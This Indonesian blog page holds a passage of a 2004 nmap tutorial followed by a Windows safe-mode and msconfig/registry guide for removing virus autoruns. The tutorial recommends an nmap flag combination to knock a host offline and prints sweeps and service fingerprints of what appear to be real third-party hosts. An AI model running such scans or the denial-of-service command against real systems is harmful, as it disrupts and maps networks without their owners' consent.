Hal lain yang dapat kamu lakukan dengan -sT scanning adalah DoS (Denial of Service) sebuah Host.
seperti contoh dibawah ini…..

cyberzone:/home/vQ# nmap -T 5 -M 1000 -sT 203.130.254.xx
Warning: Your max_parallelism (-M) option is absurdly high! Don’t complain to Fyodor if all hell breaks loose!

berhubung target tujuan sudah memakai Stack-Guard (maka tidak terjadi kerusakan), tapi apabila anda melakukan ini ke Host yang running W*ndows XP kemungkinan 95% akan mengalami Crash. Bila kamu perhatikan bahwa aku memberi nmap -T 5 -M 1000, “Flag” -M adalah “Flag” untuk menggunakan jumlah maksimal “socket” yang digunakan oleh Nmap dan 60 “Socket” sudah bisa dikategorikan banyak (dan diatas aku memakai 1000 !! tapi sangat efektif euY….)

“Flag” -T adalah “Flag” untuk mengatur kecepatan scanning oleh Nmap. 0 yang terpelan dan 5 yang tercepat.

0 = Paranoid Mencoba menghindari deteksi IDS,tak ada scanning pararel, menunggu 5 menit sebelum mengirim tiap paket, so…. it really f*cking slow !

1 = Sneaky Juga mencoba untuk menghindari deteksi IDS, tak ada scanning pararel, menunggu 15 detik sebelum mengirim tiap paket…

2 = Polite Tetap sangat lambat, akan terdeteksi oleh semua jenis IDS. Menunggu sekitar 0.4 detik tiap paketnya. kira-kira 1 detik/paket.

3 = Normal kecepatan scanning standard nmap, yaitu scanning secepat mungkin tanpa resiko DoS.

4 = Aggressive sangat bagus untuk Network yang cepat (High Speed Broadband),mampu menembus firewall dan jaringan yang ter-filter.

5 = Insane a.k.a GeNdHeNg (gila), kamu akan kehilangan beberapa informasi direkomendasikan untuk Sweeping Network.

********************************************
* UDP scan -sU UDP port scan
********************************************
cyberzone:/home/vQ# nmap -sU 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 16:17 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1463 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
53/udp open domain
69/udp filtered tftp
111/udp open rpcbind
135/udp filtered msrpc
137/udp filtered netbios-ns
138/udp open netbios-dgm
139/udp filtered netbios-ssn
161/udp open snmp
162/udp open snmptrap
445/udp filtered microsoft-ds
1434/udp filtered ms-sql-m
3130/udp open squid-ipc
3401/udp open squid-snmp
32768/udp open omad
32770/udp open sometimes-rpc4
Nmap run completed — 1 IP address (1 host up) scanned in 2112.724 seconds

Tapi biasanya ada juga yang memakai firewall sehingga probing lewat UDP gak akan sukses, kalo udah begini ada cara lain lagi…..

Pinging -sP ping scan (Sweeping Host aktif)

cyberzone:/home/vQ# nmap –packet_trace -sP 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:11 WIT
SENT (0.0190s) ICMP 202.148.13.xx > 203.130.254.xx Echo request (type=8/code=0) ttl=42 id=17732 iplen=28

SENT (0.0190s) TCP 202.148.13.xx:59530 > 203.130.254.xx:80 A ttl=51 id=7528iplen=40 seq=750241886 win=4096 ack=750241886

RCVD (1.3770s) ICMP 203.130.254.xx > 202.148.13.xx Echo reply (type=0/code=0) ttl=55 id=26445 iplen=28

Host xx.subnet254.astinet.telkom.net.id (203.130.254.xx) appears to be up.

Nmap run completed — 1 IP address (1 host up) scanned in 12.340 seconds

Namun beberapa Host melakukan blok terhadap ping karena dianggap cukup efektif untuk menyembunyikan (Cloaking) Server mereka.

Teknik dasar untuk melihat Host yang aktif.

cyberzone:/home/vQ# nmap -sP 203.130.254.*
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:20 WIT
Host 1.subnet254.astinet.telkom.net.id (203.130.254.1) appears to be up.
Host 5.subnet254.astinet.telkom.net.id (203.130.254.5) appears to be up.
Host 16.subnet254.astinet.telkom.net.id (203.130.254.16) appears to be up.
Host 17.subnet254.astinet.telkom.net.id (203.130.254.17) appears to be up.
Host 29.subnet254.astinet.telkom.net.id (203.130.254.29) appears to be up.
Host 31.subnet254.astinet.telkom.net.id (203.130.254.31) appears to be up.
Host 32.subnet254.astinet.telkom.net.id (203.130.254.32) seems to be a subnet roadcast address (returned 1 extra pings). Note — the actual IP also responded.
Host 36.subnet254.astinet.telkom.net.id (203.130.254.36) appears to be up.
Host 37.subnet254.astinet.telkom.net.id (203.130.254.37) appears to be up.
Host 47.subnet254.astinet.telkom.net.id (203.130.254.47) seems to be a subnet roadcast address (returned 1 extra pings). Note — the actual IP also responded.
Host 48.subnet254.astinet.telkom.net.id (203.130.254.48) appears to be up.
Host 49.subnet254.astinet.telkom.net.id (203.130.254.49) appears to be up.
Host 63.subnet254.astinet.telkom.net.id (203.130.254.63) appears to be up.
Host 65.subnet254.astinet.telkom.net.id (203.130.254.65) appears to be up.
Host 68.subnet254.astinet.telkom.net.id (203.130.254.68) appears to be up.
Host 69.subnet254.astinet.telkom.net.id (203.130.254.69) appears to be up.
Host 81.subnet254.astinet.telkom.net.id (203.130.254.81) appears to be up.
Host 96.subnet254.astinet.telkom.net.id (203.130.254.96) appears to be up.
Host 97.subnet254.astinet.telkom.net.id (203.130.254.97) appears to be up.
Host 111.subnet254.astinet.telkom.net.id (203.130.254.111) appears to be up.
Host 203.130.254.128 appears to be up.
Host 129.subnet254.astinet.telkom.net.id (203.130.254.129) appears to be up.
Host 130.subnet254.astinet.telkom.net.id (203.130.254.130) appears to be up.
Host 131.subnet254.astinet.telkom.net.id (203.130.254.131) appears to be up.
Host 142.subnet254.astinet.telkom.net.id (203.130.254.142) appears to be up.
Host 143.subnet254.astinet.telkom.net.id (203.130.254.143) appears to be up.
Host 203.130.254.160 appears to be up.
Host 203.130.254.161 appears to be up.
Host 203.130.254.162 appears to be up.
Host 203.130.254.163 appears to be up.
Host 203.130.254.164 appears to be up.
Host 203.130.254.165 appears to be up.
Host 203.130.254.166 appears to be up.
Host 203.130.254.167 appears to be up.
Host 203.130.254.168 appears to be up.
Host 203.130.254.169 appears to be up.
Host 203.130.254.170 appears to be up.
Host 203.130.254.171 appears to be up.
Host 203.130.254.172 appears to be up.
Host 203.130.254.173 appears to be up.
Host 203.130.254.174 appears to be up.
Host 203.130.254.175 appears to be up.
Host 203.130.254.176 appears to be up.
Host 179.subnet254.astinet.telkom.net.id (203.130.254.179) appears to be up.
Host 180.subnet254.astinet.telkom.net.id (203.130.254.180) appears to be up.
Host 183.subnet254.astinet.telkom.net.id (203.130.254.183) appears to be up.
Host 191.subnet254.astinet.telkom.net.id (203.130.254.191) appears to be up.
Host telkomgw.stikom.edu (203.130.254.193) appears to be up.
Host 203.130.254.194 appears to be up.
Host ambrosia.stikom.edu (203.130.254.195) appears to be up.
Host omega.stikom.edu (203.130.254.196) appears to be up.
Host download.stikom.edu (203.130.254.197) appears to be up.
Host 203.130.254.199 appears to be up.
Host 203.130.254.200 appears to be up.
Host 215.subnet254.astinet.telkom.net.id (203.130.254.215) appears to be up.
Nmap run completed — 256 IP addresses (55 hosts up) scanned in 335.697 seconds

*******************************************
* Ftp Bounce Attack -b
********************************************

[Menarik tapi tak berguna]

cyberzone:/home/vQ# nmap -b 203.130.254.xx 203.130.254.xx

Hint: if your bounce scan target hosts aren’t reachable from here, remember to use -P0 so we don’t try and ping them prior to the scan Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:44 WIT

Your ftp bounce proxy server won’t talk to us!

Ini yang bakalan kamu terima setiap FTP server yang kamu scanning !!

/* Penutup */

Sebenarnya masih banyak tehnik lain lagi yang bisa dilakukan tergantung kreatifitas anda, sebagai tambahan aku sertakan salah satu Combo Scanning yang biasa aku lakukan….

cyberzone:/home/vicky# nmap -v -sS -sV -O -v 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:52 WIT
Host xx.subnet254.astinet.telkom.net.id (203.130.254.xx) appears to be up … good.
Initiating SYN Stealth Scan against xx.subnet254.astinet.telkom.net.id (203.130.254.xx) at 17:52
Adding open port 110/tcp
Adding open port 6000/tcp
Adding open port 995/tcp
adjust_timeout: packet supposedly had rtt of 12210894 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13126862 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13696829 microseconds. Ignoring time.
Adding open port 80/tcp
adjust_timeout: packet supposedly had rtt of 25753793 microseconds. Ignoring time.
Adding open port 3306/tcp
adjust_timeout: packet supposedly had rtt of 25845379 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 26664043 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13675951 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13597619 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27226534 microseconds. Ignoring time.
Adding open port 53/tcp
adjust_timeout: packet supposedly had rtt of 51264396 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27144765 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 51336689 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52158192 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13717478 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52711309 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27273293 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52631826 microseconds. Ignoring time.
Adding open port 993/tcp
adjust_timeout: packet supposedly had rtt of 13668042 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 100643854 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52756355 microseconds. Ignoring time.
Adding open port 22/tcp
adjust_timeout: packet supposedly had rtt of 99334735 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27012389 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 101595861 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13831231 microseconds. Ignoring time.
Adding open port 443/tcp
adjust_timeout: packet supposedly had rtt of 100721309 microseconds. Ignoring time.
Adding open port 25/tcp
adjust_timeout: packet supposedly had rtt of 102030144 microseconds. Ignoring time.
Adding open port 587/tcp
adjust_timeout: packet supposedly had rtt of 27349002 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10864537 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 51118187 microseconds. Ignoring time.
Adding open port 199/tcp
Adding open port 3128/tcp
adjust_timeout: packet supposedly had rtt of 11560500 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10717091 microseconds. Ignoring time.
Adding open port 465/tcp
Adding open port 143/tcp
Adding open port 21/tcp
adjust_timeout: packet supposedly had rtt of 24399319 microseconds. Ignoring time.
Adding open port 111/tcp
adjust_timeout: packet supposedly had rtt of 11045019 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10938220 microseconds. Ignoring time.

The SYN Stealth Scan took 174 seconds to scan 1659 ports.
Initiating service scan against 17 services on 1 host at 17:55
The service scan took 38 seconds to scan 17 services on 1 host.
Initiating RPCGrind Scan against xx.subnet254.astinet.telkom.net.id (203.130.254.xx) at 17:56
The RPCGrind Scan took 3 seconds to scan 1 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE VERSION
21/tcp open ftp vsFTPd 1.1.0
22/tcp open ssh OpenSSH 3.4p1 (protocol 1.99)
25/tcp open smtp
53/tcp open domain ISC Bind 9.2.1
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
110/tcp open pop3 Courier pop3d
111/tcp open rpcbind 2 (rpc #100000)
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap Courier IMAP4rev1 1.7.X
199/tcp open smux Linux SNMP multiplexer
443/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
445/tcp filtered microsoft-ds
465/tcp open ssl OpenSSL
587/tcp open smtp Courier smtpd
593/tcp filtered http-rpc-epmap
993/tcp open ssl OpenSSL
995/tcp open ssl OpenSSL
3128/tcp open http-proxy Squid webproxy 2.4.STABLE7
3306/tcp open mysql?
6000/tcp open X11 (access denied)
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi:
SF-Port25-TCP:V=3.50%D=6/24%Time=40DAB33B%P=i686-pc-linux-gnu%r(Help,1C,”2
SF:20\x20mail\.jombang\.org\x20ESMTP\r\n”);
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.6 - 2.4.21, Linux Kernel 2.4.19 - 2.4.20, Linux 2.4.21 (X86)
OS Fingerprint:
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN
=134%DAT=E)

Nmap run completed — 1 IP address (1 host up) scanned in 256.323 seconds

Bila kamu perhatikan diatas aku make “Flag” -v sampai 2x, sesuai anjuran Fyodor (yg punya Nmap), sebaiknya “Flag” -v (verbose) dipakai 2x untuk meningkatkan akurasi nya….. trus “Flag” -sV untuk menebak service yang berjalan di port yang terbuka dan “Flag” -O untuk menebak Sistem Operasi (OS) a.k.a OS Fingerprinting.


(source:www.arai.web.id)

Selengkapnya...

Safe mode? Ya … Windows biasanya akan diperlengkapi dengan modus safe mode. Dimaksudkan agar pemakai dapat memperbaiki Windows jika terjadi suatu musibah. Windows safe mode sebetulnya tidak lebih dari Windows yang dijalankan dengan driver standar! Sehingga jika terjadi kerewelan pada driverdriver non-standar Windows yang membuat Windows modus standar gagal dijalankan, maka Windows modus standar dapat dipulihkan lagi dengan cara masuk ke modus safe mode. Pada saat dalam modus safe mode inilah, pemakai berkesempatan untuk melakukan eliminasi pada drive non-standar yang bermasalah tersebut. Dengan cara ini, Windows yang rusak akan menjadi normal kembali. Itu harapannya. Melihat fungsinya, tentu saja, modus safe mode ini, juga merupakan ancaman bagi kelangsungan hidup virus atau program-program yang suka membuat masalah … ☺ Oleh karena itu, modus safe mode ini juga merupakan target utama program virus. Artinya, virus akan berusaha memanipulasi modus safe mode atau bahkan menggagalkan fungsinya!
Bagaimana masuk ke modus safe mode?

  1. Lakukan booting ulang komputer. Pada saat proses booting dimulai, tekanlah tombol F8 secara cepat dan berulangkali. (Agak histeris juga boleh… ☺) Sehingga muncul menu boot Windows. Pilihlah Safe Mode, maka proses akan berjalan hingga akhirnya menampilkan pilihan user yang harus digunakan untuk masuk ke Windows safe mode. Pada Windows XP, biasanya akan muncul account Administrator dan account yang kita punya. Pilihlah user Account yang biasa kita pakai.
  2. Setelah itu biasanya kita akan ditanya, apakah akan masuk ke modus Safe mode ataukah kita akan memakai fasilitas system restore Windows. Klik Yes, maka kita akan masuk ke mode Windows safe mode. Artinya, Windows akan aktif dengan perangkat apa adanya (standar minimalnya).
  3. Aktif dalam Safe Mode. Ada subkey registry Windows yang berguna untuk menjalankan suatu program secara otomatis saat Windows dihidupkan. Jadi, jika kita ingin agar suatu file executable aktif saat Windows dihidupkan, maka kita harus menulisi subkey autorun ini dengan suatu nama value yang berisi data yang menyebutkan bahwa file X.EXE adalah file yang harus dieksekusi. X di sini mewakili sembarang nama file EXE. Tools standar milik Windows untuk memeriksa konfigurasi autorun adalah program System Configuration Utility atau lebih dikenal dengan nama "msconfig" karena file pengaktif program tersebut bernama msconfig.exe.
  4. Untuk memanggil "msconfig", lakukan via perintah Run dari menu Start. Klik Start - pilih Run dan ketikkan msconfig. Tekan Enter atau klik OK.
  5. Jendela System Configuration Utility akan muncul dan terlihat beberapa tab. Salah satunya tab Startup. Tab tersebut berguna untuk melihat program apa saja yang akan dijalankan oleh Windows pada saat Windows diaktifkan. Ini dia!
Virus biasanya akan memblokir penggunaan program ini. Entah itu dengan
mematikan pilihan Run atau memonitor caption (judul/nama) jendela program yang sedang aktif. Jika caption program yang sedang aktif adalah sama dengan caption yang telah ditargetkan oleh virus, secara otomatis virus akan segera menutupnya atau mungkin melakukan booting ulang. Sekarang sampeyan tahu sebabnya, bukan? Mengapa saat suatu virus aktif, dan kita memanggil msconfig, tiba-tiba jendela program msconfig menutup dengan sendirinya. Atau mungkin, tiba-tiba, komputer melakukan booting ulang

Tab Startup msconfig
Pada tab Startup, akan terlihat kolom Startup item, yang menunjukkan nama item yang akan dijalankan saat Windows diaktifkan. Juga kolom command, yang biasanya berisi program yang diaktifkan plus parameternya jika ada. Sedangkan kolom Location, menunjukkan lokasi subkey (syaraf) registry yang menyimpan setting data ini. Pada contoh terlihat, nama SMTray ternyata adalah milik program yang bernama SMTray.exe dan berada di folder d:\Program Files\Analog Devices\SoundMAX. Virus biasanya akan membuat suatu nilai di sini, agar file yang memicu pengaktif programnya dijalankan saat booting Windows terjadi sehingga penelitian di bagian ini amat penting untuk dilakukan. Celakanya lagi, virus-virus sekarang memasangkan nama itemnya dengan nama yang “berbau-bau” nama file sistem Windows. Hal ini untuk mengelabui pemakai yang memeriksanya. Misalnya, dengan nama windows.exe, svc0host.exe, rundlll.exe dan lain sebagainya. Di sini kejelian kitalah yang menentukan sukses tidaknya mengenali file virus. Dan ini perlu latihan. Jika kita sudah menemukan item yang kita curigai, hilangkan tanda centang yang ada di depan startup item. Jika tidak dicentang, artinya item tersebut tidak akan dijalankan saat booting dilakukan. Sebaliknya, jika dicentang, maka akan dijalankan. Setelah kita melakukan proses centang atau un-centang.....OK dan lakukan booting ulang agar proses pengubahan menjadi aktif.

Tools standar milik Windows lainnya yang dapat dipakai untuk memeriksa
konfigurasi autorun registry adalah program Registry Editor. Untuk memanggilnya, dilakukan via perintah Run dari menu Start. Klik Start - pilih Run dan ketikkan regedit. Tekan Enter atau klik OK. Program registry editor akan tampil. Pergilah ke lokasi:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Klik ganda berulangkali pada subkey yang terlihat sehingga lokasi tersebut
ditemukan. Pada subkey Run inilah biasanya virus akan menuliskan nama value baru untuk mengaktifkan program virus. Untuk menghapus data yang ada, klik nama value dan tekan DEL.

Lokasi-lokasi lain yang perlu kita periksa dalam rangka autorun registry ini
adalah:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Once
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OnceEx
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Jika ditemukan nama value yang menurut Anda aneh, hapus saja …Dari beberapa subkey di atas, ada satu subkey yang cukup istimewa. Yaitu subkey RunOnce. Berbeda dengan subkey Run yang akan selalu menjalankan program yang ada di dalamnya setiap kali Windows dihidupkan, subkey RunOnce ini biasanya dipakai untuk menjalankan satu program sebanyak satu kali saja! Jadi, subkey ini biasanya dipakai oleh suatu program untuk mengaktifkan prosesnya sebanyak satu kali saja sehingga nama value yang dituliskan di sini hanya akan berlaku satu kali saja. Setelah dijalankan, nama value tersebut akan dihapus. Jika pembuat virus cukup nakal, ia akan membuat program virus untuk menuliskan pengaktifnya di subkey ini. Jadi, virus akan aktif saat komputer dihidupkan. Program akan dijalankan dan nama value pemicu akan dihapus. Maka ia tidak meninggalkan jejak di msconfig. Selang beberapa waktu saat virus aktif, ia akan membuat program timer yang secara berkala menulis ulang nama value di subkey tersebut. Atau mungkin virus hanya akan menuliskan data pada subkey RunOnce saat komputer akan di-log off. Dengan cara tersebut, virus akan terjaga eksistensinya. Lumayan cerdik ‘khan? Selengkapnya...